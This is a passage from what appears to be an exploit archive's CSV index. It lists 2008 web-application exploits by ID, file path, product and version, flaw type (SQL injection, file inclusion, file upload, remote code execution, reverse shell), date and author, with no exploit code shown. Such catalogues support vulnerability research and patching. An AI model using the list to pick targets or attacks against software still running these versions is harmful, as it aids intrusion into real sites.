2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps, -5822,exploits/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Local File Inclusion",2008-06-15,"CWH Underground",php,webapps, -5823,exploits/php/webapps/5823.txt,"Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection",2008-06-15,Mr.SQL,php,webapps, -5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps, -5826,exploits/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps, -5828,exploits/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' SQL Injection",2008-06-15,anonymous,php,webapps, -5829,exploits/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps, -5830,exploits/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - 'section' SQL Injection",2008-06-16,Mr.SQL,php,webapps, -5831,exploits/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,php,webapps, -5832,exploits/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps, -5833,exploits/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps, -5834,exploits/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5835,exploits/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5836,exploits/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5838,exploits/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5839,exploits/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' SQL Injection",2008-06-17,SuNHouSe2,php,webapps, -5840,exploits/php/webapps/5840.txt,"easyTrade 2.x - 'id' SQL Injection",2008-06-17,anonymous,php,webapps, -5841,exploits/php/webapps/5841.txt,"ThaiQuickCart 3 - 'sLanguage' Cookie Local File Inclusion",2008-06-17,"CWH Underground",php,webapps, -5842,exploits/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5844,exploits/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload",2008-06-17,Stack,php,webapps, -5845,exploits/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps, -5846,exploits/php/webapps/5846.txt,"eroCMS 1.4 - 'site' SQL Injection",2008-06-17,Mr.SQL,php,webapps, -5847,exploits/php/webapps/5847.txt,"WebCalendar 1.0.4 - 'includedir' Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps, -5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",php,webapps, -5849,exploits/asp/webapps/5849.txt,"doITlive CMS 2.50 - SQL Injection / Cross-Site Scripting",2008-06-18,BugReport.IR,asp,webapps, -5850,exploits/asp/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,asp,webapps, -5852,exploits/php/webapps/5852.txt,"netBIOS - 'newsid' SQL Injection",2008-06-18,"security fears team",php,webapps, -5853,exploits/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - 'categori' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps, -5854,exploits/php/webapps/5854.txt,"Mybizz-Classifieds - 'cat' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps, -5855,exploits/php/webapps/5855.txt,"Easy Webstore 1.2 - SQL Injection",2008-06-18,Mr.SQL,php,webapps, -5856,exploits/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps, -5857,exploits/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' SQL Injection",2008-06-18,Stack,php,webapps, -5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,php,webapps, -5859,exploits/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps, -5860,exploits/php/webapps/5860.txt,"OwnRS blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",php,webapps, -5861,exploits/php/webapps/5861.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps, -5862,exploits/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' SQL Injection",2008-06-19,dun,php,webapps, -5863,exploits/php/webapps/5863.txt,"CMS-BRD - 'menuclick' SQL Injection",2008-06-19,dun,php,webapps, -5864,exploits/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps, -5865,exploits/php/webapps/5865.txt,"CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection",2008-06-19,anonymous,php,webapps, -5866,exploits/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps, -5867,exploits/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' SQL Injection",2008-06-19,"Hussin X",php,webapps, -5868,exploits/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps, -5869,exploits/asp/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,asp,webapps, -5870,exploits/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps, -5871,exploits/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps, -5872,exploits/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps, -5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps, -5874,exploits/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Local File Inclusion",2008-06-20,storm,php,webapps, -5875,exploits/php/webapps/5875.txt,"CiBlog 3.1 - 'id' SQL Injection",2008-06-20,Mr.SQL,php,webapps, -5876,exploits/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps, -5877,exploits/php/webapps/5877.txt,"jaxultrabb 2.0 - Local File Inclusion / Cross-Site Scripting",2008-06-20,"CWH Underground",php,webapps, -5878,exploits/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,php,webapps, -5879,exploits/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection (1)",2008-06-20,Mr.SQL,php,webapps, -5880,exploits/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting",2008-06-21,"CWH Underground",php,webapps, -5881,exploits/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps, -5882,exploits/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps, -5883,exploits/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection",2008-06-21,"S.L TEAM",php,webapps, -5884,exploits/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,php,webapps, -5885,exploits/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps, -5886,exploits/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps, -5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps, -5888,exploits/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps, -5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,php,webapps, -5890,exploits/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",php,webapps, -5892,exploits/php/webapps/5892.txt,"phpAuction 3.2.1 - 'item.php' SQL Injection",2008-06-21,"Hussin X",php,webapps, -5893,exploits/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps, -5894,exploits/asp/webapps/5894.txt,"DUdForum 3.0 - 'iFor' SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps, -5895,exploits/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps, -5896,exploits/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",php,webapps, -5897,exploits/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps, -5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps, -5899,exploits/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps, -5900,exploits/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps, -5901,exploits/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps, -5902,exploits/php/webapps/5902.txt,"HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion",2008-06-22,CraCkEr,php,webapps, -5903,exploits/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps, -5904,exploits/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,php,webapps, -5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps, -5906,exploits/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps, -5907,exploits/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps, -5908,exploits/php/webapps/5908.txt,"HoMaP-CMS 0.1 - 'go' SQL Injection",2008-06-23,SxCx,php,webapps, -5909,exploits/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation / SQL Injection",2008-06-23,Cod3rZ,php,webapps, -5910,exploits/php/webapps/5910.txt,"Ready2Edit - 'menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps, -5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,php,webapps, -5912,exploits/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - 'newsid' SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps, -5913,exploits/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps, -5914,exploits/php/webapps/5914.txt,"Demo4 CMS - 'id' SQL Injection",2008-06-23,"CWH Underground",php,webapps, -5915,exploits/php/webapps/5915.txt,"Joomla! Component FacileForms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps, -5916,exploits/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Remote File Inclusion",2008-06-23,CraCkEr,php,webapps, -5917,exploits/php/webapps/5917.txt,"TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps, -5919,exploits/php/webapps/5919.txt,"mm chat 1.5 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps, -5920,exploits/php/webapps/5920.txt,"ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps, -5921,exploits/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - 'mod_root' Remote File Inclusion",2008-06-23,CraCkEr,php,webapps, -5922,exploits/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps, -5923,exploits/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps, -5924,exploits/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps, -5925,exploits/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps, -5927,exploits/asp/webapps/5927.txt,"DUcalendar 1.0 - 'iEve' SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps, -5928,exploits/php/webapps/5928.txt,"HiveMaker Directory 1.0.2 - 'cid' SQL Injection",2008-06-24,"security fears team",php,webapps, -5929,exploits/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - 'bannerid' SQL Injection",2008-06-24,"Hussin X",php,webapps, -5930,exploits/php/webapps/5930.txt,"Link ADS 1 - 'linkid' SQL Injection",2008-06-24,"Hussin X",php,webapps, -5931,exploits/php/webapps/5931.pl,"TOKOKITA - 'produk_id' SQL Injection",2008-06-24,k1tk4t,php,webapps, -5932,exploits/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - 'hal' SQL Injection",2008-06-25,"CWH Underground",php,webapps, -5933,exploits/php/webapps/5933.txt,"mUnky 0.0.1 - 'zone' Local File Inclusion",2008-06-25,StAkeR,php,webapps, -5934,exploits/php/webapps/5934.txt,"Jokes & Funny Pics Script - 'sb_jokeid' SQL Injection",2008-06-25,"Hussin X",php,webapps, -5935,exploits/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps, -5936,exploits/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps, -5937,exploits/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - 'pid' SQL Injection",2008-06-25,"CWH Underground",php,webapps, -5938,exploits/php/webapps/5938.php,"PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload",2008-06-25,EgiX,php,webapps, -5939,exploits/php/webapps/5939.txt,"Joomla! Component netinvoice 1.2.0 SP1 - SQL Injection",2008-06-25,His0k4,php,webapps, -5940,exploits/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,"CWH Underground",php,webapps, -5941,exploits/php/webapps/5941.txt,"polypager 1.0rc2 - SQL Injection / Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps, -5942,exploits/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - 'category' SQL Injection",2008-06-26,boom3rang,php,webapps, -5944,exploits/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusions",2008-06-26,"CWH Underground",php,webapps, -5945,exploits/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload",2008-06-26,EgiX,php,webapps, -5946,exploits/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - 'riddleid' SQL Injection",2008-06-26,InjEctOr5,php,webapps, -5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,php,webapps, -5948,exploits/php/webapps/5948.txt,"Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' SQL Injection",2008-06-26,InjEctOr5,php,webapps, -5949,exploits/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - 'drinkid' SQL Injection",2008-06-26,InjEctOr5,php,webapps, -5950,exploits/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,php,webapps, -5952,exploits/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusions",2008-06-26,CraCkEr,php,webapps, -5954,exploits/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps, -5955,exploits/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'params.php?gConf[dir][layouts]' Remote File Inclusion",2008-06-26,Ciph3r,php,webapps, -5956,exploits/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps, -5957,exploits/php/webapps/5957.txt,"OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting",2008-06-27,"CWH Underground",php,webapps, -5958,exploits/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps, -5959,exploits/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps, -5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,php,webapps, -5961,exploits/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' SQL Injection",2008-06-27,boom3rang,php,webapps, -5962,exploits/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting",2008-06-28,CraCkEr,php,webapps, -5963,exploits/php/webapps/5963.txt,"Joomla! Component jabode - 'id' SQL Injection",2008-06-28,His0k4,php,webapps, -5964,exploits/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",php,webapps, -5965,exploits/php/webapps/5965.txt,"Joomla! Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps, -5966,exploits/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps, -5967,exploits/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps, -5969,exploits/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' SQL Injection",2008-06-30,anonymous,php,webapps, -5970,exploits/php/webapps/5970.txt,"eSHOP100 - 'SUB' SQL Injection",2008-06-30,JuDge,php,webapps, -5971,exploits/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps, -5972,exploits/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps, -5973,exploits/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps, -5974,exploits/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps, -5975,exploits/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps, -5976,exploits/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps, -5977,exploits/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps, -5980,exploits/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps, -5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps, -5982,exploits/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps, -5983,exploits/php/webapps/5983.txt,"CAT2 - 'spaw_root' Local File Inclusion",2008-07-01,StAkeR,php,webapps, -5984,exploits/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' SQL Injection",2008-07-01,"CWH Underground",php,webapps, -5985,exploits/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' SQL Injection",2008-07-01,"CWH Underground",php,webapps, -5986,exploits/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps, -5987,exploits/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps, -5988,exploits/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' SQL Injection",2008-07-01,"Hussin X",php,webapps, -5989,exploits/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps, -5990,exploits/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,php,webapps, -5991,exploits/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' SQL Injection",2008-07-02,haZl0oh,php,webapps, -5992,exploits/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Local File Inclusion",2008-07-02,"CWH Underground",php,webapps, -5993,exploits/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps, -5994,exploits/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps, -5995,exploits/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps, -5996,exploits/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps, -5997,exploits/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps, -5998,exploits/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' SQL Injection",2008-07-03,storm,php,webapps, -5999,exploits/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' SQL Injection",2008-07-03,"Virangar Security",php,webapps, -6000,exploits/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,php,webapps, -6001,exploits/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Local/Remote File Inclusions",2008-07-04,DSecRG,php,webapps, -6002,exploits/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps, -6003,exploits/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps, -6005,exploits/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps, -6006,exploits/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps, -6007,exploits/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,php,webapps, -6008,exploits/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps, -6009,exploits/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps, -6010,exploits/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps, -6011,exploits/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",php,webapps, -6014,exploits/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps, -6015,exploits/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps, -6016,exploits/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps, -6017,exploits/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,php,webapps, -6018,exploits/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps, -6019,exploits/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps, -6021,exploits/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps, -6022,exploits/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps, -6023,exploits/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps, -6024,exploits/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions",2008-07-08,RoMaNcYxHaCkEr,php,webapps, -6025,exploits/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps, -6026,exploits/linux/webapps/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,webapps,80 -6027,exploits/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps, -6028,exploits/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps, -6033,exploits/php/webapps/6033.pl,"AuraCMS 2.2.2 - '/pages_data.php' Arbitrary Edit/Add/Delete",2008-07-09,k1tk4t,php,webapps, -6034,exploits/php/webapps/6034.txt,"DreamPics Builder - 'page' SQL Injection",2008-07-09,"Hussin X",php,webapps, -6035,exploits/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps, -6036,exploits/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps, -6037,exploits/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps, -6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",php,webapps, -6041,exploits/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps, -6042,exploits/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps, -6044,exploits/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' SQL Injection",2008-07-11,"Hussin X",php,webapps, -6047,exploits/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps, -6048,exploits/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps, -6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps, -6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps, -6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps, -6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",php,webapps, -6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",php,webapps, -6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps, -6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps, -6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,php,webapps, -6058,exploits/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",php,webapps, -6060,exploits/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",php,webapps, -6061,exploits/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6062,exploits/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6063,exploits/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6064,exploits/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6065,exploits/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure 